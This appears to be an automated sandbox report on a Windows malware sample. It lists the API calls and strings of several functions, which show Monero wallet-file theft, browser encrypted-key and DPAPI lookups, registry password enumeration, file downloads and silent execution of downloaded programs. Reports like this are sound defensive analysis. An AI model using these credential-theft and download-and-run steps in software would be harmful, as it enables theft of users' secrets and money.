Instruction Fuzzy Hash: 1BE11F72954108FBEB15EBA0DC99FEEB77CEF54300F404169F10662191EF386A4ACB62

Function 00748320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

RegOpenKeyExA.ADVAPI32(00000000,00FCE2B0,00000000,00020019,00000000,007505B6), ref: 007483A4
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00748426
wsprintfA.USER32 ref: 00748459
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0074847B
RegCloseKey.ADVAPI32(00000000), ref: 0074848C
RegCloseKey.ADVAPI32(00000000), ref: 00748499

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Strings

?, xrefs: 0074837A
- , xrefs: 007485A3
%s\%s, xrefs: 0074844D

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: ae07cadd137b16dc80ed07833d3c00fff6eabcde12cc52f5ba342fd6459a5b65
Instruction ID: 3b00029c7c4c66b0ca4b9ba728dec8e25216cd7ddd447b054598f9f0cd3f42bf
Opcode Fuzzy Hash: ae07cadd137b16dc80ed07833d3c00fff6eabcde12cc52f5ba342fd6459a5b65
Instruction Fuzzy Hash: CA811AB295411CEBEB68DB54CC95FEEB7B8FB48700F008298E109A6180DF756B85CF91

Function 00740A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

memset.MSVCRT ref: 00740C1C
lstrcatA.KERNEL32(?,00000000), ref: 00740C35
lstrcatA.KERNEL32(?,00750D7C), ref: 00740C47
lstrcatA.KERNEL32(?,00000000), ref: 00740C5D
lstrcatA.KERNEL32(?,00750D80), ref: 00740C6F
lstrcatA.KERNEL32(?,00000000), ref: 00740C88
lstrcatA.KERNEL32(?,00750D84), ref: 00740C9A
lstrlenA.KERNEL32(?), ref: 00740CA7
memset.MSVCRT ref: 00740CCD
memset.MSVCRT ref: 00740CE1

Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885

Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 007496C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00740B85,?,00000000,?,00000000,007505C6,007505C5), ref: 007496E1

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00750D88,?,00000000), ref: 00740D5A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00740D66

Strings

.exe, xrefs: 00740A95

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
String ID: .exe
API String ID: 1395395982-4119554291
Opcode ID: 8bc71f8a8ad9bccd8fe1229218b9c49ddbe79e9139ac52f5307a0b19bb6c53b1
Instruction ID: 5367db6d39eb6168a273d7c9831ba1c506a6617e276f7d704be9c30afb58f98e
Opcode Fuzzy Hash: 8bc71f8a8ad9bccd8fe1229218b9c49ddbe79e9139ac52f5307a0b19bb6c53b1
Instruction Fuzzy Hash: C38146B1540118FBDB14EB60DD9AFED737CAF44305F004199B70A66091EF786A89CF9A

Function 00749010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0074906C

Strings

image/jpeg, xrefs: 00749136

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: b926990dd5c6dcbd7a0f1cb8429f8cc1251a01d9ea0a4aa1e1df47fca2db1b39
Instruction ID: 67da62ca8848b41029d17f28eb471c88b9c6963ad16814e9f0c66d2e59484811
Opcode Fuzzy Hash: b926990dd5c6dcbd7a0f1cb8429f8cc1251a01d9ea0a4aa1e1df47fca2db1b39
Instruction Fuzzy Hash: BD71E2B2914208EBDB04DFE4DC99FDEB7B9BF88700F108508F615A7290DB78A945DB61

Function 007412D0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00741307
strtok_s.MSVCRT ref: 00741750

Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: a3ae4e632702313b740e8e1584fb5a3ffb22a881c93d91c3217c51dce2aff0c1
Instruction ID: 57028187b5d28a878c44b1ce87216a16ace1a1210d6737b25a29e48940f56edc
Opcode Fuzzy Hash: a3ae4e632702313b740e8e1584fb5a3ffb22a881c93d91c3217c51dce2aff0c1
Instruction Fuzzy Hash: CCC193B694020DEBCB14EF60DC8DFEE7378BB54304F004599E50AA7241EB78AA85CF91

Function 00744280 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0074429E
memset.MSVCRT ref: 007442B5

Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B

lstrcatA.KERNEL32(?,00000000), ref: 007442EC
lstrcatA.KERNEL32(?,00FCFFB8), ref: 0074430B
lstrcatA.KERNEL32(?,?), ref: 0074431F
lstrcatA.KERNEL32(?,00FD00C0), ref: 00744333

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 00748D90: GetFileAttributesA.KERNEL32(00000000,?,00740117,?,00000000,?,00000000,00750DAB,00750DAA), ref: 00748D9F

Part of subcall function 00739CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00739D39
Part of subcall function 00739CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00739D92

Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
Part of subcall function 007399C0: LocalFree.KERNEL32(007402E7), ref: 00739A90
Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A

Part of subcall function 007493C0: GlobalAlloc.KERNEL32(00000000,007443DD,007443DD), ref: 007493D3

StrStrA.SHLWAPI(?,00FCFE08), ref: 007443F3
GlobalFree.KERNEL32(?), ref: 00744512

Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF
Part of subcall function 00739AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A
Part of subcall function 00739AC0: LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F

Part of subcall function 00739E10: memcmp.MSVCRT(?,v20,00000003), ref: 00739E2D

lstrcatA.KERNEL32(?,00000000), ref: 007444A3
StrCmpCA.SHLWAPI(?,007508D1), ref: 007444C0
lstrcatA.KERNEL32(00000000,00000000), ref: 007444D2
lstrcatA.KERNEL32(00000000,?), ref: 007444E5
lstrcatA.KERNEL32(00000000,00750FB8), ref: 007444F4

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1191620704-0
Opcode ID: f501928ca226782f57e4cc8b374fffea34e67e8c92bfee37d996ece61374836f
Instruction ID: d358284c203cea922d888cf6e2126d587a420edc2d204e3f51192435fc090f5f
Opcode Fuzzy Hash: f501928ca226782f57e4cc8b374fffea34e67e8c92bfee37d996ece61374836f
Instruction Fuzzy Hash: D37128B6910208F7DB14EBA0DC89FEE7379BB88300F044598F61996181DB78DB55DF92

Function 00731310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00731327

Part of subcall function 007312A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 007312B4
Part of subcall function 007312A0: HeapAlloc.KERNEL32(00000000), ref: 007312BB
Part of subcall function 007312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007312D7
Part of subcall function 007312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 007312F5
Part of subcall function 007312A0: RegCloseKey.ADVAPI32(?), ref: 007312FF

lstrcatA.KERNEL32(?,00000000), ref: 0073134F
lstrlenA.KERNEL32(?), ref: 0073135C
lstrcatA.KERNEL32(?,.keys), ref: 00731377

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00731465

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
Part of subcall function 007399C0: LocalFree.KERNEL32(007402E7), ref: 00739A90
Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A

DeleteFileA.KERNEL32(00000000), ref: 007314EF
memset.MSVCRT ref: 00731516

Strings

.keys, xrefs: 0073136B
wallet_path, xrefs: 00731330
SOFTWARE\monero-project\monero-core, xrefs: 00731335
\Monero\wallet.keys, xrefs: 0073138D

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: fea485f7a33824fd62f3c4d023f323fc194d7ca703451a5530b83f39e50a17d7
Instruction ID: d3cbc421d38b5cb08b5a8505cfbd115cf55cac9322b575f0a8a1a15a6d718c89
Opcode Fuzzy Hash: fea485f7a33824fd62f3c4d023f323fc194d7ca703451a5530b83f39e50a17d7
Instruction Fuzzy Hash: AF5147B1D50118E7D715FB60DD96BED737CAF54300F4041A8B60A62092EF786B89CFA6

Function 007360A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007347EA
Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734801
Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734818
Part of subcall function 007347B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00734839
Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849

InternetOpenA.WININET(00750DF7,00000001,00000000,00000000,00000000), ref: 0073610F
StrCmpCA.SHLWAPI(?,00FCD800), ref: 00736147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0073618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007361B3
InternetReadFile.WININET(a+t,?,00000400,?), ref: 007361DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0073620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00736249
InternetCloseHandle.WININET(a+t), ref: 00736253
InternetCloseHandle.WININET(00000000), ref: 00736260

Strings

a+t, xrefs: 007360B0, 0073617F, 00736266, 00736124, 007360B3
a+t, xrefs: 0073624F, 007361D8, 007361DB, 00736252

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: a+t$a+t
API String ID: 4287319946-2529819367
Opcode ID: 3720357b2d802206a8ef20473045d8c406fef04177835282d2258d5146d7fd95
Instruction ID: 85ad3be9c392f88d4da6c8dd92508b3871669b0763efbe09a505d7084bdc784c
Opcode Fuzzy Hash: 3720357b2d802206a8ef20473045d8c406fef04177835282d2258d5146d7fd95
Instruction Fuzzy Hash: 36516FB1A40208FBEB24DF50DC49BEE77B8FB44705F108098A609A71C1DB796A85CF95

Function 00742E30 Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

ShellExecuteEx.SHELL32(0000003C), ref: 007431C5
ShellExecuteEx.SHELL32(0000003C), ref: 0074335D
ShellExecuteEx.SHELL32(0000003C), ref: 007434EA

Strings

.dll, xrefs: 007431E5
/i ", xrefs: 007433E4
.msi, xrefs: 00743398
/passive, xrefs: 0074345B
"" , xrefs: 0074309A
<, xrefs: 00743490

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<
API String ID: 2507796910-1961616256
Opcode ID: 44e86c015a61c04fe20806be3985ddb56525c96478e7ec81701bd79708cec26e
Instruction ID: c6cbf5cbd1186fff19da2d4ca96103fb293675039461b65d9a86aebdce78d3a9
Opcode Fuzzy Hash: 44e86c015a61c04fe20806be3985ddb56525c96478e7ec81701bd79708cec26e
Instruction Fuzzy Hash: 8E12EE71850108EAEB19FBA0DC96FEDB77CAF14300F504169F50666191EF786B4ACFA2

Function 007470D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 007470DE

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

OpenProcess.KERNEL32(001FFFFF,00000000,0074730D,007505BD), ref: 0074711C
memset.MSVCRT ref: 0074716A
??_V@YAXPAX@Z.MSVCRT(?), ref: 007472BE

Strings

st, xrefs: 007472AE, 00747179, 0074717C
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0074718C
st, xrefs: 00747111

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: st$st$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-2923598100
Opcode ID: 34441cb5d8473500a3033b25224617599092edb757ffefe067028469426e59d1
Instruction ID: 28922b56070a0dc454cbd1cfd3fa8d3930fe6cffeef29f95938f6a52ac25b8e7
Opcode Fuzzy Hash: 34441cb5d8473500a3033b25224617599092edb757ffefe067028469426e59d1
Instruction Fuzzy Hash: 86515FB0D44218DFDB28EBA0DC85BEEB774FF44305F1040A9E61566181EB786E88CF59

Function 007375D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007372D0: memset.MSVCRT ref: 00737314
Part of subcall function 007372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00737C90), ref: 0073733A
Part of subcall function 007372D0: RegEnumValueA.ADVAPI32(00737C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007373B1
Part of subcall function 007372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0073740D
Part of subcall function 007372D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 00737452
Part of subcall function 007372D0: HeapFree.KERNEL32(00000000,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 00737459

lstrcatA.KERNEL32(00000000,007517FC,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?,?,007461C4), ref: 00737606
lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00737648
lstrcatA.KERNEL32(00000000, : ), ref: 0073765A
lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0073768F
